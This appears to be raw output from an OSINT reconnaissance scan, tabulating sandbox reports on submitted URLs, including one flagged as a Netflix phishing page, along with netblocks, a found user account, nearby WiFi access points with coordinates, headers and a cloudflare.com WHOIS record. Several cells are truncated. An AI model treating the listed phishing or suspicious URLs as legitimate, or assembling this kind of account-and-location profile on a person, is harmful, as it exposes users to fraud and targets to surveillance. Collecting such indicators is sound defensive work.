| 2023-05-12 02:47:06 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://app-mobile-link.ml', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://url1021.joinpreventor.com/ls/click?upn=bna4-2BmY1ITDZjl0PQKir67uPPI2f2DxWOATqx3-2Fj7OYylB8Hflza-2F4c-2BTJ51THm64bMitYJMpTuBxoVK0JwiPA-3D-3DbIZs_mSllOFscLbgTD69Yd5M4iZvJ2paH7zkSD0m2J2dAKbXAH-2BqpVRSKcCjXP2k6p2y4nrVy7lmBrfgOzMBh71z-2FxzpQdOSEWu-2BZu6bLzGdNpAef0msgWTQ8GjPF3HDwIREahUwNjJmuPNPOCq8kmJFsGovhuQHANzkUNF2qYZDjnaeii8u-2B4tCDbRuTvyHxW-2F4G4-2F8I34SGcemXBehR0ER9-2FOn27NKTXVFHKhuRFZGUzt5qNTOBOuOjmw9DiFzaj628S91bNxgYKtUY6ND6xDYvSswMqyTNX1SGlfzGDBI4KPIl1cR6mrPgDzb4lMqV1eoyIjMH1VfBoaIpPQIsSt-2FeLX6lXw-2BweMGQuDjIQ1gKTOo3gpd-2BPujm5M8OM3WO1y6kaT-2BHQiw25YdzyLgte2vg6SnLm5F0hYcK1FjLzKXxt7q61Y1Nl6A-2BBTdDOpidTdo4', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_cc4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_cc4_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_cc4_IESQMMUTEX_0_303"\n "IsoScope_cc4_IE_EarlyTabStart_0xc0c_Mutex"\n "IsoScope_cc4_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3268"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_cc4_ConnHashTable<3268>_HashTable_Mutex"\n 
"Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.115.56:80"\n "52.25.204.60:443"\n "18.155.202.100:443"\n "142.251.214.138:443"\n "142.250.72.200:443"\n "54.237.133.81:443"\n "185.199.111.153:443"\n "108.138.245.23:443"\n "108.139.1.40:443"\n "157.240.22.25:443"\n "136.143.191.67:443"\n "142.251.214.131:443"\n "172.217.12.110:443"\n "18.155.202.12:443"\n "91.199.212.52:80"\n "204.141.43.48:443"\n "136.143.191.144:443"\n "136.143.190.97:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"url1021.joinpreventor.com"\n "crt.usertrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"crt.usertrust.com"\n "maciejsawicki.com"\n "salesiq.zoho.com"\n "salesiq.zohopublic.com"\n "url1021.joinpreventor.com"\n "vts.zohopublic.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked 
as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2FBD.tmp" as clean (type is "data")'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on process "00000000-00003968"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"5fc94f03728d607c48960ad7_nav-educational_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2b5847afb666a7db5b8_nav-kyb_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5f774173a2f6f8ffce80d3d6_decor-rows_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c73c18f306a879a966_nav-law_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c8774cf47e14dd70e9_nav-telecommunications_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2b59f7e103028de58c7_nav-user-veritifcation_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2adbcece0bb48a61a5d_nav-driver-registration_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2b2bd7876b3f1ab0491_nav-identity-veritifcation_1_.svg" has 
type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c87e98373560b7c150_nav-transport_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "625514f697cb9539930c08dc_arrow_lists_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff61e333be007ebd657a9e2_Powerfull-notice_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fc071f4e509f3bc3acd619d_Check%20icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff61e34886f01f4ab6763a4_Powerfull-political_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c611b6f7021b7a90b6_nav-healthcare_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff61e3603c269bbe2a4fd83_Powerfull-transactions_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5f774173a2f6f8720a80d3d7_decor-dots_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "606cb3abf47891862f1bf393_icon-vimeo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "63c5d39997f0b639e8d1db34_icon_solutions_4_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fc94f03a68318a6830bfa8d_nav-ecommerce_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6307aad46dbfb3ff5914cc43_arrow_direction_right_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]'}, {u'category': u'Environment Awareness', u'origin': u'File/Memory', u'identifier': u'string-167', u'name': u'Contains ability to retrieve the contents of the STARTUPINFO structure (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed API string:"GetStartupInfo" [Source: 00000000-00003968.00000000.67673.00491000.00000020.mdmp\n 
00000000-00003968.00000000.67698.00491000.00000020.mdmp]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"GET /5f774172772fc1fb1fa10c12/5f774173a2f6f80a3d80d3be_twitter.png HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: https://preventor.com/solutions/preventor-namesAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: uploads-ssl.webflow.comDNT: 1Connection: Keep-Alive" (Indicator: "twitter")\n "GET /5f774172772fc1fb1fa10c12/606cb3a9126777b98ff68805_icon-youtube.png HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: https://preventor.com/solutions/preventor-namesAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: uploads-ssl.webflow.comDNT: 1Connection: Keep-Alive" (Indicator: "youtube")'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-20', u'name': u'HTTP request contains Base64 encoded artifacts', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1132/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1132.001', u'relevance': 7, u'threat_level': 0, u'type': 7, u'description': u'"n"\n "v"\n "f"\n "9"\n "t"\n "="\n "<"\n "6"\n "`"\n "X"\n ">"\n "c"\n ")"\n "A"\n "w"\n "L"\n "u"\n "L"\n "y"\n """, "L", ";", "J", """\n "<"\n "6"\n "f"\n "S"\n "0"\n "y"\n "3"\n "h"\n "~"\n " "\n "b"\n "v"\n "t"\n "\\"\n "U"\n "E"\n """, "5", "N", ".", "\'", "\\", "`", "k", "~", "0", "{", "=", ":", "P", "t", "Z", "f", "/", "1", "6", "I", "d", "h", "q", "D", "j", "0", "6", "2", "f", "O", "8", "*", "b", "E", "j", "/", "P", 
"v", "C", "v", "/", ".", "-", "6", ";", "_", "q", "Q", "D", "}", "S", "J", "M", "u", "E", "n", "D", "V", "F", "S", ";", "y", "l", "=", "!", "s", "j", ">", "/", "u", "l", "`", "`", "T", "c", "C", "+", "0", "2", "5", "}", "R", "W", "0", "H", "W", "j", "<", "S", "*", "W", "W", "U", "_", "+", "v", "U", "0", "d", ".", "2", ":", ">", "3", "u", ".", "i", "=", """\n "."\n "n"\n "E"\n "+"\n "Q"\n "c"\n "/"\n "2"\n "V"\ | 185.199.111.153 |
| 2023-05-12 02:46:32 | Netblock Membership | No | RIPE | 2 | 0 | 3 | 0 | None | 172.67.160.0/20 | 172.67.168.252 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Picsart (Category: art)
https://picsart.com/u/Altpapier | Altpapier |
| 2023-05-12 02:52:21 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://hassan-gamall.github.io/netflix', u'type': u'submitted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://hassan-gamall.github.io/netflix', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d70_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d70_ConnHashTable<3440>_HashTable_Mutex"\n "IsoScope_d70_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d70_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3440"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_d70_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_d70_IE_EarlyTabStart_0xf28_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3440"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': 
u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:80"\n "185.199.108.153:443"\n "45.57.91.1:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"hassan-gamall.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "hassan-gamall.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "urlref_httphassan-gamall.github.ionetflix")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"o1_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "bb_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "netflix-logo-0_1_.png" has type "PNG image data 2208 x 684 8-bit/color RGBA non-interlaced" and extension "png"\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"\n "images_1_.png" has type "PNG image data 225 x 225 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{ab1e121d-ebc0-11ed-82af-0800276d1839}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfcf958f5828d0de64.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{ab1e121b-ebc0-11ed-82af-0800276d1839}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfcf958f5828d0de64.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{ab1e121d-ebc0-11ed-82af-0800276d1839}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\imagestore\\3mt7jhv\\imagestore.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\0x82k3c6.txt"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\1hgch0kk.txt"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "o1_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "bootstrap.min_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "bb_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "bootstrap.bundle.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "netflix-logo-0_1_.png" has type "PNG image data 2208 x 684 8-bit/color RGBA non-interlaced"- 
[targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003440]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF8A0CDA8A96816CC6.TMP" has type "data"- Location: [%TEMP%\\~DF8A0CDA8A96816CC6.TMP]- [targetUID: 00000000-00003440]\n "~DF02F37B05898AC81F.TMP" has type "data"- Location: [%TEMP%\\~DF02F37B05898AC81F.TMP]- [targetUID: 00000000-00003440]\n "~DF432D2BE44D8F536C.TMP" has type "data"- Location: [%TEMP%\\~DF432D2BE44D8F536C.TMP]- [targetUID: 00000000-00003440]\n "~DFCF958F5828D0DE64.TMP" has type "data"- Location: [%TEMP%\\~DFCF958F5828D0DE64.TMP]- [targetUID: 00000000-00003440]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003440]\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced"- [targetUID: N/A]\n "netflix_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "main_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "RecoveryStore._AB1E121B-EBC0-11ED-82AF-0800276D1839_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_AB1E121D-EBC0-11ED-82AF-0800276D1839_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_B326E299-EBC0-11ED-82AF-0800276D1839_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "images_1_.png" has type "PNG image data 225 x 225 8-bit colormap non-interlaced"- [targetUID: N/A]\n "GVF5NTIT.txt" has type "ASCII text"- Location: 
[%APPDATA%\\Microsoft\\Windows\\Cookies\\GVF5NTIT.txt]- [targetUID: 00000000-00003440]\n "IXTTQ3R7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IXTTQ3R7.txt]- [targetUID: 00000000-00003440]\n "8BT6E19R.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8BT6E19R.txt]- [targetUID: 00000000-00003440]\n "search_2_.json" has ty | 185.199.108.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | hhonors (Net ID: 00:01:03:86:22:27) | 41.8781, -87.6298 |
| 2023-05-12 02:54:27 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Content_Length": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Content_Length": ["0"], "X_Nf_Request_Id": ["01H05GB7HXKZRW69FWMYAA1JFJ"], "Server": ["Netlify"]} | 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Best_Western_27 (Net ID: 00:00:C5:D7:5F:74) | 41.8781, -87.6298 |
| 2023-05-12 03:01:51 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.110.154:443 | 185.199.110.0/24 |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | Domain Name: CLOUDFLARE.COM
Registry Domain ID: 1542998887_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2017-05-24T17:44:01Z
Creation Date: 2009-02-17T22:07:54Z
Registry Expiry Date: 2024-02-17T22:07:54Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS3.CLOUDFLARE.COM
Name Server: NS4.CLOUDFLARE.COM
Name Server: NS5.CLOUDFLARE.COM
Name Server: NS6.CLOUDFLARE.COM
Name Server: NS7.CLOUDFLARE.COM
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 32996839A6D808AFE3EB4A795A0E6A7A39A76FC52FF228B22B76F6D63826F2B9
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.COM
Registry Domain ID: 1542998887_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2021-09-27T15:18:45Z
Creation Date: 2009-02-17T22:07:54Z
Registrar Registration Expiration Date: 2024-02-17T22:07:54Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Name Server: ns3.cloudflare.com
Name Server: ns4.cloudflare.com
Name Server: ns5.cloudflare.com
Name Server: ns6.cloudflare.com
Name Server: ns7.cloudflare.com
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
